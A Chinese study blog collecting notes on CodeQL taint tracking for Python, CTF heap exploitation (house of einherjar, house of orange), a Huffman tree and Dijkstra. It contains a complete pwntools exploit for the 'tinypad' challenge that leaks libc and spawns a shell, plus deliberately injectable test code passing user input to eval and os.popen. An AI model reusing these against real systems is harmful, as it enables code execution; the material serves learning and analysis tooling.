分类 Learning 下的文章

官方文档:https://help.semmle.com/QL/learn-ql/python/pointsto-type-infer.html

中文翻译:https://github.com/xsser/codeql_chinese

Python-CodeQL中抽象语法树相关的类

Abstract syntax tree

  • AstNode > - Module – A Python module > - Class – The body of a class definition > - Function – The body of a function definition > - Stmt – A statement >> - Assert – An assert statement >> - Assign – An assignment >>> - AssignStmt – An assignment statement, x = y >>> - ClassDef – A class definition statement >>> - FunctionDef – A function definition statement >> - AugAssign – An augmented assignment, x += y >> - Break – A break statement >> - Continue – A continue statement >> - Delete – A del statement >> - ExceptStmt – The except part of a try statement >> - Exec – An exec statement >> - For – A for statement >> - If – An if statement >> - Pass – A pass statement >> - Print – A print statement (Python 2 only) >> - Raise – A raise statement >> - Return – A return statement >> - Try – A try statement >> - While – A while statement >> - With – A with statement > - Expr – An expression >> - Attribute – An attribute, obj.attr >> - Call – A function call, f(arg) >> - IfExp – A conditional expression, x if cond else y >> - Lambda – A lambda expression >> - Yield – A yield expression >> - Bytes – A bytes literal, b"x" or (in Python 2) "x" >> - Unicode – A unicode literal, u"x" or (in Python 3) "x" >> - Num – A numeric literal, 3 or 4.2 >>> - IntegerLiteral >>> - FloatLiteral >>> - ImaginaryLiteral >> - Dict – A dictionary literal, {'a': 2} >> - Set – A set literal, {'a', 'b'} >> - List – A list literal, ['a', 'b'] >> - Tuple – A tuple literal, ('a', 'b') >> - DictComp – A dictionary comprehension, {k: v for ...} >> - SetComp – A set comprehension, {x for ...} >> - ListComp – A list comprehension, [x for ...] >> - GenExpr – A generator expression, (x for ...) >> - Subscript – A subscript operation, seq[index] >> - Name – A reference to a variable, var >> - UnaryExpr – A unary operation, -x >> - BinaryExpr – A binary operation, x+y >> - Compare – A comparison operation, 0 < x < 10 >> - BoolExpr – Short circuit logical operations, x and y, x or y

Analyzing control flow

同一个函数作用域中查找互斥块

import python

from BasicBlock b1, BasicBlock b2
where b1 != b2 and not b1.strictlyReaches(b2) and not b2.strictlyReaches(b1) and
exists(Function shared, BasicBlock entry |
    entry.contains(shared.getEntryNode()) and
    entry.strictlyReaches(b1) and entry.strictlyReaches(b2)
)
select b1, b2

This typically gives a very large number of results, because it is a common occurrence in normal control flow. It is, however, an example of the sort of control-flow analysis that is possible. Control-flow analyses such as this are an important aid to data flow analysis. For more information, see Analyzing data flow and tracking tainted data in Python.

搜索结果特别大,可用性不高,可以优化一下

Pointer analysis & type inference

指针分析: https://zhuanlan.zhihu.com/p/79804033 (算法较为复杂,尝试丢给求解器计算) 类型推断: https://zhuanlan.zhihu.com/p/97441100

The predicate ControlFlowNode.pointsTo(...) shows which object a control flow node may 'point to' at runtime.

ControlFlowNode.pointsTo(...) has three variants:

predicate pointsTo(Value object)
predicate pointsTo(Value object, ControlFlowNode origin)
predicate pointsTo(Context context, Value object, ControlFlowNode origin)

For complex data flow analyses, involving multiple stages, the ControlFlowNode version is more precise, but for simple use cases the Expr based version is easier to use. For convenience, the Expr class also has the same three predicates. Expr.pointsTo(...) also has three variants:

predicate pointsTo(Value object)
predicate pointsTo(Value object, AstNode origin)
predicate pointsTo(Context context, Value object, AstNode origin)

查询无法被执行的异常处理块

当一个Try语句中,先后有多个Handler,但是前面所捕捉的错误类型是后面的超类,就会导致后面的错误捕捉永远无法被执行

该查询中利用i<j来表示Handler的顺序,利用getTypepointsTo确定类关系。

猜测 | 符号在此处的作用类似与管道,把输入定向到后面的子句。注意在第二个exists中由于调用了谓词,所以进行了两次定向。

getASuperType()可以获得超类。

import python

from Try t, ExceptStmt ex1, ExceptStmt ex2
where
exists(int i, int j |
    ex1 = t.getHandler(i) and ex2 = t.getHandler(j) and i < j
)
and
exists(ClassValue cls1, ClassValue cls2 |
    ex1.getType().pointsTo(cls1) and
    ex2.getType().pointsTo(cls2) |
    not cls1 = cls2 and
    cls1 = cls2.getASuperType()
)
select t, ex1, ex2

寻找可能将不可迭代对象作为循环迭代的位置

不溯源

通过loopup可以查看一些类属性

import python 
from For loop, Value iter, ClassValue cls 
where loop.getIter().getAFlowNode().pointsTo(iter) 
    and   cls = iter.getClass() 
    and   not exists(cls.lookup("__iter__")) 
select loop, cls

溯源(结合AstNode)

使用 predicate pointsTo(Value object, AstNode origin) 这个谓词,并输出origin

import python

from For loop, Value iter, ClassValue cls, AstNode origin
where loop.getIter().pointsTo(iter, origin) and
  cls = iter.getClass() and
  not cls.hasAttribute("__iter__")
select loop, cls, origin

Finding calls using call-graph analysis

直接通过函数名查找函数调用

import python

from Call call, Name name
where call.getFunc() = name and name.getId() = "eval"
select call, "call to 'eval'."

问题:

  1. 可能误认为某些对自定义方法名为eval的方法的调用
  2. 默认了调用的函数名为eval,可能漏掉一些情况

改良版
利用Value::named()和getACall取得对eval正确调用,然后在控制流图上检索出来
同时结合控制流图检索可以有效防止跑到python内置模块中搜索一大堆无关结果,提高了结果的相关性
(技巧:合理利用CFG)

import python

from ControlFlowNode call, Value eval
where eval = Value::named("eval") and
      call = eval.getACall()
select call, "call to 'eval'."

Analyzing data flow & tracking tainted data —— 数据流、污点追踪

Tracking user-controlled, or tainted, data is a key technique for security researchers.
数据流分析和污点追踪的主要用途在于分析用户可控的输入是否可能作为污点数据进行恶意行为,或者一些敏感数据会不会被泄露。

CodeQL的CFG分析模块设计思路

主要要解决标准库无法跟踪、变量间赋值导致的混淆以及需要大量计算时间的问题...

  1. Local data flow, concerning the data flow within a single function. When reasoning about local data flow, you only consider edges between data flow nodes belonging to the same function. It is generally sufficiently fast, efficient and precise for many queries, and it is usually possible to compute the local data flow for all functions in a CodeQL database.
  2. Global data flow, effectively considers the data flow within an entire program, by calculating data flow between functions and through object properties. Computing global data flow is typically more time and energy intensive than local data flow, therefore queries should be refined to look for more specific sources and sinks.

Taint Tracking 的组成

  1. One or more sources of potentially insecure or unsafe data, represented by the TaintTracking::Source class. 多个追踪源
  2. One or more sinks, to where the data or taint may flow, represented by the TaintTracking::Sink class. 多个薄弱位置
  3. Zero or more sanitizers, represented by the Sanitizer class. 0或多个过滤器

Taint Tracking 查询的基本形式

类继承之后要按照实际情况重写几个主要的谓词,以便具体化源和目标位置的特征。
主要负责完成追踪的是hasFlow方法。

/**
 * @name ...
 * @description ...
 * @kind problem
 */

import semmle.python.security.TaintTracking

class MyConfiguration extends TaintTracking::Configuration {

    MyConfiguration() { this = "My example configuration" }

    override predicate isSource(TaintTracking::Source src) { ... }

    override predicate isSink(TaintTracking::Sink sink) { ... }

    /* optionally */
    override predicate isExtension(Extension extension) { ... }

}

from MyConfiguration config, TaintTracking::Source src, TaintTracking::Sink sink
where config.hasFlow(src, sink)
select sink, "Alert message, including reference to $@.", src, "string describing the source"

从HTPP请求到Unsafe函数的Track

在定义Sink类型的时候需要继承自TainiTracking::Sink,并写一个类似“构造函数”的东西说明Sink的特征,最后重写sinks方法说明Sink的类型。

/* Import the string taint kind needed by our custom sink */
import semmle.python.security.strings.Untrusted

/* Sources */
import semmle.python.web.HttpRequest

/* Sink */
/** A class representing any argument in a call to a function called "unsafe" */
class UnsafeSink extends TaintTracking::Sink {

    UnsafeSink() {
        exists(FunctionValue unsafe |
            unsafe.getName() = "unsafe" and
            unsafe.getACall().(CallNode).getAnArg() = this
        )
    }

    override predicate sinks(TaintKind kind) {
        kind instanceof StringKind
    }

}

class HttpToUnsafeConfiguration extends TaintTracking::Configuration {

    HttpToUnsafeConfiguration() {
        this = "Example config finding flow from http request to 'unsafe' function"
    }

    override predicate isSource(TaintTracking::Source src) { src instanceof HttpRequestTaintSource }

    override predicate isSink(TaintTracking::Sink sink) { sink instanceof UnsafeSink }

}

from HttpToUnsafeConfiguration config, TaintTracking::Source src, TaintTracking::Sink sink
where config.hasFlow(src, sink)
select sink, "This argument to 'unsafe' depends on $@.", src, "a user-provided value"

样例中其实还有很多东西没说明白,其实关键在于弄清楚以下几个东西的写法:

  • Source (TaintTracking::Source) > 表示起始点
  • Sink (TaintTracking::Sink) > 表示利用点 (Source和Sink都封装了很多常用的类)
  • Configuration (TaintTracking::Configuration) > 负责串联Source和Sink
  • TaintKind (TaintKind) > 可以使用内置的或自定的 文档写的并不是很深入、详细,可能需要翻看封装好的库借鉴一下

TaintTracking::Sink和TaintTracking::Source中用于确定污点类型的谓词分别如下:

abstract class Source {
    abstract predicate isSourceOf(TaintKind kind);
    ...
}

abstract class Sink {
    abstract predicate sinks(TaintKind taint);
    ...
}

案例测试

测试用例(其一)

Source: input()

Sink: eval()

module: calc.py

import os, sys, re

class calc:
    def checkExpr(self, expr):
        a = re.split(pattern=r"[+|-|x|/]", string = expr)
        print(a)
        try:
            int(a[0])
            int(a[1])
        except:
            return 0
        return 1
    def getResult(self, expr):
        if(self.checkExpr(expr)):
            full_expr = "print(%s)"%(expr)
            print(full_expr)
            eval(full_expr) #sink2
            return 1
        else:
            print("hacker!")
            return 0

module: test1.py

import os, sys, re
import calc as ca

class calc:
    def checkExpr(self, expr):
        a = re.split(pattern=r"[+|-|x|/]", string = expr)
        print(a)
        try:
            int(a[0])
            int(a[1])
        except:
            return 0
        return 1
    def getResult(self, expr):
        if(self.checkExpr(expr)):
            full_expr = "print(%s)"%(expr)
            print(full_expr)
            eval(full_expr) #sink2
            return 1
        else:
            print("hacker!")
            return 0

def checkExpr(expr):
    a = re.split(pattern=r"[+|-|x|/]", string = expr)
    print(a)
    try:
        int(a[0])
        int(a[1])
    except:
        return 0
    return 1
def getResult(expr):
    if(checkExpr(expr)):
        full_expr = "print(%s)"%(expr)
        print(full_expr)
        eval(full_expr) #sink2
        return 1
    else:
        print("hacker!")
        return 0

expr = input("expr> ")

test = calc()
test.getResult(expr)

getResult(expr)

module: test2

import os, sys

black_list = ["cmd", "cmd.exe"]

cmd = input("cmd> ")

for item in black_list:
    if item in cmd:
        print("hacker!")
        break
else:
    print(os.popen(cmd).read()) #sink1



我的发现

CodeQL似乎对python的跨模块DataFlow支持不太好(也有一定可能是我写的查询不够完善)。
估计这是个普遍性问题,NAVEX的作者设计思路也是在一开始单独分析每个模块中的sink,只不过她在不同的研究中采取了不同的方式完成从Source到Sink的串联。
由此可以确定,跨模块是一大难点,针对多模块python应用如何解决模块间的溯源是一个可以进行创新的角度。

控制变量分析:

  1. 当Sink在不同模块的类内部的成员方法时,无法完整溯源
  2. 当Sink在同一个模块的类内部的成员方法时,可以溯源到Source
  3. 当Sink在同一个模块单独作为函数声明时,可以溯源到Source
  4. 当Sink在不同模块单独作为函数声明时,无法完整溯源

查询脚本

//import semmle.python.security.strings.Untrusted
import python
/* Sources */
//import semmle.python.web.HttpRequest

class EvalSink extends TaintSink {
      EvalSink() {
          exists(FunctionValue eval |
              eval.getName() = "eval" and
              eval.getACall().(CallNode).getAnArg() = this
          )
      }
      override predicate sinks(TaintKind kind) {
          kind instanceof StringKind
      }

}

class InputSrc extends TaintSource{
    InputSrc() {
        exists(FunctionValue input|
            input.getName() = "input" and
            this = input.getACall()
        )
    }
    override predicate isSourceOf(TaintKind kind) {
        kind instanceof StringKind
    }
}

class InputToEvalConfiguration extends TaintTracking::Configuration {

    InputToEvalConfiguration() {
          this = "Example config finding flow from http request to 'unsafe' function"
      }

      override predicate isSource(TaintSource src) { src instanceof InputSrc }

      override predicate isSink(TaintSink sink) { sink instanceof EvalSink }

}

  from InputToEvalConfiguration config, TaintSource src, TaintSink sink
  where config.hasFlow(src, sink)
  select sink, "This argument to 'eval' depends on $@.", src, "a user-provided value"

虽然这也不是啥特别高级的技术,都是已有技术的组合。但是在实际运用的时候面临各种条件限制,各种奇葩构造方式真是让人心力憔悴。这部分wiki里给的例题还不错,集合了很多实用的技巧,值得深入分析。

引用: https://wiki.x10sec.org/pwn/heap/house_of_einherjar

0x00 原理

0x01 题目分析

源代码解析

利用点

0x02 exp思路

思路

难点

完整exp

python3

#!/usr/bin/python3

from pwn import *

p = process("./tinypad")
elf = ELF("./tinypad")
libc = ELF("./libc.so.6")

context.log_level = "debug"

def add(size:int,content):
    p.recvuntil(b"(CMD)>>> ")
    p.sendline(b"A")
    p.recvuntil(b"(SIZE)>>> ")
    p.sendline(str(size).encode())
    p.recvuntil(b"(CONTENT)>>> ")
    p.sendline(content)
    

def delete(idx:int):
    p.recvuntil(b"(CMD)>>> ")
    p.sendline(b"D")
    p.recvuntil(b"(INDEX)>>> ")
    p.sendline(str(idx).encode())
   
def edit(idx:int,content):
    p.recvuntil(b"(CMD)>>> ")
    p.sendline(b"E")
    p.recvuntil(b"(INDEX)>>> ")
    p.sendline(str(idx).encode())
    p.recvuntil(b"(CONTENT)>>> ")
    p.sendline(content)
    p.recvuntil(b"(Y/n)>>> ")
    p.sendline(b"Y")
    
def quit():
    p.recvuntil(b"(CMD)>>> ")
    p.sendline(b"Q")

def exp():
    # 1. leak heap (UAF)
    add(0x70,b"aaaaaaaa") #idx1
    add(0x70,b"bbbbbbbb") #idx2
    '''注意先delete(2)再delete(1)是因为1的低位有\x00,导致strlen无法获取长度并输出'''
    delete(2)
    delete(1)
    p.recvuntil(b"INDEX: 1")
    p.recvuntil(b"CONTENT: ")
    heap = u64(p.recvuntil(b"\n",drop=True).ljust(8,b"\x00")) - 0x80
    print("heap:",hex(heap))
    #gdb.attach(p)

    # 2. leak libc (UAF)
    add(0x80,b"aaaaaaaa") #idx1
    add(0x10,b"bbbbbbbb") #idx2
    delete(1)
    p.recvuntil(b"INDEX: 1")
    p.recvuntil(b"CONTENT: ")
    unsortedbin_arena = u64(p.recvuntil(b"\n",drop=True).ljust(8,b"\x00"))
    libc_base = unsortedbin_arena - 0x58 - 0x3C4B20
    print("unsortedbin_arena:",hex(unsortedbin_arena))
    print("libc_base:",hex(libc_base))
    #gdb.attach(p)
    delete(2)
    
    # 3. house of einherjar
    add(0x18,b"a"*0x18) #idx1
    add(0x100,b"b"*0xf8+b"\x11") #idx2
    add(0x100,b"c"*0xf8) #idx3
    add(0x100,b"d"*0xf8) #idx4
    
    tinypad = 0x602040
    fakechunk_addr = tinypad + 0x20 #tinypad+0x30-0x10 (total:0x100)
    fakechunk_size = 0x101
    fakechunk = p64(0)+p64(fakechunk_size)+p64(fakechunk_addr)*2
    edit(3,b"p"*0x20 + fakechunk)
    
    prevsize = heap+0x1b0-fakechunk_addr
    print("heap:",hex(heap))
    print("prevsize:",hex(prevsize))
    edit(1,b"a"*0x18)
    edit(1,b"a"*0x17)
    edit(1,b"a"*0x16)
    edit(1,b"a"*0x15)
    edit(1,b"a"*0x14)
    payload1 = b"a"*0x10 + p64(prevsize)
    edit(1,payload1)
    delete(2)

    
    # fix fakechunk size,fd,bk
    payload2 = b"p"*0x20+p64(0)+p64(0x101)+p64(unsortedbin_arena)*2
    edit(4,payload2)

    # 4. main_ret -> one_gadget
    one_gadget = libc_base + 0x45216
    environ = libc_base + 0x3c6f38
    print("one_gadget:",hex(one_gadget))
    print("environ:",hex(environ))
    #gdb.attach(p)
    
    payload3 = b"p"*0xd0 + b"d"*8 + p64(environ) + b"d"*8 + p64(0x602148)
    add(0xf8,payload3) #idx2
    
    p.recvuntil(b"INDEX: 1")
    p.recvuntil(b"CONTENT: ")
    main_ret = u64(p.recvuntil(b"\n",drop=True).ljust(8,b"\x00")) - 0xf0
    print("main_ret:",hex(main_ret))
    
    #modify main_ret to one_gadget
    edit(2,p64(main_ret))
    edit(1,p64(one_gadget))
    
    #quit and getshell
    p.sendline(b"Q")
    p.interactive()
    
    

if __name__ == "__main__":
    exp()

参考来源: https://wiki.x10sec.org/pwn/heap/house_of_orange/
(这里总结一下做个笔记)

0x00 背景

少数情况下不能直接控制free函数释放掉想要的堆块获得unsorted_chunk,需要用一种其它的方式获得一个unsorted_chunk,House Of Orange正是一种不用控制free从而获得释放堆块的堆利用技巧

使用条件

  1. 需要能够通过堆溢出或者其它什么方式,间接或直接控制Top Chunk的size域,改变其大小。
  2. 可以使用malloc请求分配自定义大小的堆块。

0x01 原理

触发条件

在分配新堆块时,_int_malloc依次检查 fastbin、small bins、unsorted bin、large bins是否可以满足分配要求,如果都不符合,将尝试从现有Top Chunk中分配。如果还不符合,那么ptmalloc就不再继续作用,而是使用sysmalloc向系统申请内存到用户区域。此时2原有的Top Chunk将会被置入unsorted_bin。

限制条件

该方法对修改Top Chunk的size域的值有一定的限制

源码:

if ((unsigned long)(nb) >= (unsigned long)(mp_.mmap_threshold) && (mp_.n_mmaps < mp_.n_mmaps_max))

assert((old_top == initial_top(av) && old_size == 0) ||
     ((unsigned long) (old_size) >= MINSIZE &&
      prev_inuse(old_top) &&
      ((unsigned long)old_end & pagemask) == 0));

将这些限制总结起来就是:

分配大小限制:

  • 分配的chunk大小小于128K(此时将使用brk拓展堆,否则将使用mmap)
  • 分配的chunk大小应大于被修改后的Top Chunk大小减去 fencepost的大小

Top Chunk的size大小限制:

  • 伪造的size必须要对齐到内存页 (堆块末尾地址16进制表示时后三位为0)
  • size要大于MINSIZE(0x10)
  • size要小于之后申请的chunk size + MINSIZE(0x10)
  • size的prev inuse位必须为1

0x02 示例分析

示例

//example.cpp
//gcc example.cpp -g -o example;chmod +x example
#include<stdio.h>
#include<stdlib.h>
#include<unistd.h>
#define fake_size 0x1fe1

int main(void)
{
    void *ptr;

    ptr=malloc(0x10);
    ptr=(void *)((long long int)ptr+0x18);

    *((long long*)ptr)=fake_size;

    malloc(0x2000); //into unsorted_bin
    malloc(0x60);
}

相对于ctfwiki上的原文稍作了修改

接着用pwndbg调试

分析

初始状态:

0x602000           0x623000 rw-p    21000 0      [heap]

0x602000 FASTBIN { <-最开始分配的,为了完成堆的初始化
  prev_size = 0, 
  size = 33, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x20fe1
}
0x602020 PREV_INUSE { <-最开始的Top Chunk
  prev_size = 0, 
  size = 135137, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}

修改Fake Size

pwndbg> heap
0x602000 FASTBIN {
  prev_size = 0, 
  size = 33, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x1fe1
}
0x602020 PREV_INUSE { <-size已经被修改
  prev_size = 0, 
  size = 8161, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}
0x604000 {
  prev_size = 0, 
  size = 0, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}

malloc(0x2000) 之后

0x602000 FASTBIN {
  prev_size = 0, 
  size = 33, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x1fc1
}
0x602020 PREV_INUSE { <-通过观察fd,bk发现原来的top chunk已经进入unsorted_bin
  prev_size = 0, 
  size = 8129, 
  fd = 0x7ffff7dd1b78 <main_arena+88>, 
  bk = 0x7ffff7dd1b78 <main_arena+88>, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}
0x603fe0 {
  prev_size = 8128, 
  size = 16, 
  fd = 0x0, 
  bk = 0x11, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}
0x603ff0 PREV_INUSE {
  prev_size = 0, 
  size = 17, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}
0x604000 {
  prev_size = 0, 
  size = 0, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}

0x602000           0x646000 rw-p    44000 0      [heap]
//堆地址相比于之前扩大了

malloc(0x60) 之后

pwndbg> heap
0x602000 FASTBIN {
  prev_size = 0, 
  size = 33, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x71
}
0x602020 FASTBIN { <-从unsorted_bin中分割出来的chunk
  prev_size = 0, 
  size = 113, 
  fd = 0x7ffff7dd2208 <main_arena+1768>, 
  bk = 0x7ffff7dd2208 <main_arena+1768>, 
  fd_nextsize = 0x602020, 
  bk_nextsize = 0x602020
}
0x602090 PREV_INUSE {
  prev_size = 0, 
  size = 8017, 
  fd = 0x7ffff7dd1b78 <main_arena+88>, 
  bk = 0x7ffff7dd1b78 <main_arena+88>, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}
0x603fe0 {
  prev_size = 8016, 
  size = 16, 
  fd = 0x0, 
  bk = 0x11, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}
0x603ff0 PREV_INUSE {
  prev_size = 0, 
  size = 17, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}
0x604000 {
  prev_size = 0, 
  size = 0, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}

0x03

这类利用一般是为了创造条件,比如结合IO_FILE进行下一步的攻击

离散数学课本最后一章有讲到这一种“近大远小”的数据结构哈夫曼树,这种数据结构是实现哈夫曼编码的基础,书上讲得比较抽象于是尝试用C++简单的实现一下。

0x00 前提

在这看到了一个比较通俗易懂的解释:

https://baijiahao.baidu.com/s?id=1663514710675419737&wfr=spider&for=pc

主要就是通过一个优先队列+的结构来实现的,之前没用过STL里面的优先队列,因为需要将元素设置为自定义类型的指针,所以需要写一个比较函数来实现升序排列( priority_queue 默认是降序排列)。

如下:

struct compareNode{ //重写仿函数
	bool operator()(Node *&a, Node *&b) const
	{
		return a->weight > b->weight;//小顶堆
	}
};
priority_queue<Node*,vector<Node*>,compareNode> nodeQueue; //升序

0x01 代码实现

#include<cstdio>
#include<cstring>
#include<unistd.h>
#include<iostream>
#include<queue>
using namespace std;

#define MAXINPUT 64
#define raiseError(errMsg) write(2,errMsg,strlen(errMsg));exit(-1);
/*初始化一个新节点*/
#define initNewNode(ptr) ptr=(Node*)malloc(sizeof(Node));\
    if(ptr==NULL){raiseError("Malloc error!");}         \ 
    ptr->weight=-1;                                     \
    ptr->father=NULL;                                   \
    ptr->left=NULL;                                     \
    ptr->right=NULL;
/*生成父节点*/                                        
#define getNewFatherNode(father,leftPtr,rightPtr) initNewNode(father);\
    father->weight = leftPtr->weight + rightPtr->weight;    \
    father->left = leftPtr; father->right = rightPtr;       \
    leftPtr->father = father; rightPtr->father = father;

struct Node{
    int weight;
    struct Node *father;
    struct Node *left;
    struct Node *right;
    bool operator < (const Node &v) const{ 
        return weight > v.weight;   
    }
};
struct compareNode{
	bool operator()(Node *&a, Node *&b) const
	{
		return a->weight > b->weight; //小顶堆
	}
};
priority_queue<Node*,vector<Node*>,compareNode> nodeQueue; //升序

Node *currRoot=NULL;

void initNodeQueue(int *input,int len){ //初始化叶子节点队列
    Node *tmp=NULL;
    for(int i=0;i<len;i++){
        initNewNode(tmp);
        tmp->weight=input[i];
        nodeQueue.push(tmp);
        //printf("%d\n",tmp->weight);
    }
}

Node *huffmanTree(){ //构造哈夫曼树
    Node *leftPtr=NULL,*rightPtr=NULL;
    Node *father=NULL;
    while(nodeQueue.size()>1){
        leftPtr = nodeQueue.top(); nodeQueue.pop();
        rightPtr = nodeQueue.top(); nodeQueue.pop();
        getNewFatherNode(father,leftPtr,rightPtr);
        currRoot = father;
        nodeQueue.push(father);
    }
    return currRoot;
}

int main(int argc,char **argv){
    int input[MAXINPUT]={0};
    int j=0,len=0;
    scanf("%d",&len); //读取叶子节点个数
    len=len<MAXINPUT?len:MAXINPUT;
    for(int i=0;i<len;i++){
        scanf("%d",&input[i]); //读取叶子节点的权
    }
    initNodeQueue(input,len);
    huffmanTree();
    printf("Root weight: %d\n",currRoot->weight);
    return 0;
}

离散课上图论的时候讲了理论知识,但是还没实践过,于是拿python写了一下,顺便做个笔记防止忘记。

python自带的数据结构比较丰富,写起来的确顺滑很多,太香了md

mymap = {
    1:{1:0,3:10,5:30,6:100},
    2:{2:0,3:5},
    3:{3:0,4:50},
    4:{4:0,6:10},
    5:{4:20,5:0,6:60},
    6:{6:0}
}
max_len = 1000000

T = set() #完成最短路搜索的点集
dis = {} #起始点到其它点的距离,初始化无穷
for i in mymap.keys(): #把max_len视作无穷大
    dis[i] = max_len

start = int(input("strat:"))
end = int(input("end:"))
dis[start] = 0 #初始化源点

def get_min_key(dis:dict): #检索出T集合外的最短路
    _min_k = 0
    _min_v = max_len
    for i in dis.keys():
        if dis[i]<=_min_v and i not in T:
            _min_k = i
            _min_v = dis[i]
    return _min_k

def dijkstra(end):
    while len(T)<len(mymap): #当所有点的最短路找到后结束循环
        _min_k = get_min_key(dis)
        T.add(_min_k) #取出T集合外dis的最小值做最短路
        '''到下一个点的最短路就是一条最短路,因为如果有两条路的权加起来更短,则第一条路就要是最短的'''
        for i in mymap[_min_k].keys(): #遍历该点所有相邻点找更短路
            if dis[_min_k] + mymap[_min_k][i] < dis[i] and i not in T: #有更短路则更新当前dis
                dis[i] = dis[_min_k] + mymap[_min_k][i]
    print(dis[end]) if dis[end]!=max_len else print("+∞")

dijkstra(end)